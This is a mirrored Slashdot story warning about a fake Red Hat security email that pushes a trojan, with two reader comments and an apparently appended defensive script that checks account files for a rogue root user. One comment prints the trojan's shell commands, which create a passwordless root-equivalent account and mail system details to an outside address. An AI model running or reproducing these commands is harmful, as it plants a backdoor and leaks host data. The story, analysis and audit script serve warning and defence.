Slashdot Mirror


Beware 'Fedora-Redhat' Fake Security Alert

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a user's home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

2 of 628 comments

  1. Re:Cry havoc! by sfire · Score: 1, Redundant

    And how much you want to bet that the server was already hacked, and the real owner of the server is going to have to foot the bill?

  2. Here's my analysis by andfarm · Score: 1, Redundant

    What a coincidence - I just analysed the same thing, having seen it through Full-Disclosure. Here's the critical section:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    In other words, it'll create a root-equivalent user called 'bash' and mail some system info to root@addlebrain.com.

    --

    TANSTAAFI: There Ain't No Such Thing As A Free iPod.
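A defender-side check for what the quoted script leaves behind, added here as an example and not part of the Slashdot thread or of andfarm's analysis: it audits passwd- and shadow-format records for a second UID 0 account and for an empty password field (the result of `adduser -g 0 -u 0 -o bash` followed by `passwd -d bash`). The sample records are constructed; the function names are my own.

```shell
#!/bin/sh
# Added example, not from the Slashdot post. Detects the backdoor account
# pattern the quoted script creates: an extra UID 0 user with no password.
# The records below are constructed; the "bash" entries mimic the result
# of "adduser -g 0 -u 0 -o bash" followed by "passwd -d bash".

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bash:x:0:0::/home/bash:/bin/bash'

SAMPLE_SHADOW='root:$6$salt$hashedvalue:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$6$salt$anotherhash:19000:0:99999:7:::
bash::19000:0:99999:7:::'

# Print every account other than "root" whose UID field (3rd) is 0.
# $1: passwd-format text; defaults to the live /etc/passwd when empty.
find_extra_uid0() {
    printf '%s\n' "${1:-$(cat /etc/passwd)}" |
        awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Print every account whose shadow password field (2nd) is empty, i.e.
# one that logs in with no password at all, as "passwd -d" produces.
# $1: shadow-format text; defaults to /etc/shadow (needs root to read).
find_empty_passwords() {
    printf '%s\n' "${1:-$(cat /etc/shadow)}" |
        awk -F: '$2 == "" { print $1 }'
}

# Run both checks; return 0 when clean, 1 when anything was found,
# so the function can be called from a cron job or a monitoring agent.
audit_accounts() {
    extra=$(find_extra_uid0 "$1")
    empty=$(find_empty_passwords "$2")
    [ -n "$extra" ] && printf 'UID 0 accounts besides root: %s\n' "$extra"
    [ -n "$empty" ] && printf 'accounts with empty password: %s\n' "$empty"
    [ -z "$extra" ] && [ -z "$empty" ]
}

if audit_accounts "$SAMPLE_PASSWD" "$SAMPLE_SHADOW"; then
    echo "no suspicious accounts found"
else
    echo "suspicious accounts found"
fi
```

Calling `audit_accounts "" ""` runs the same checks against the host's real /etc/passwd and /etc/shadow.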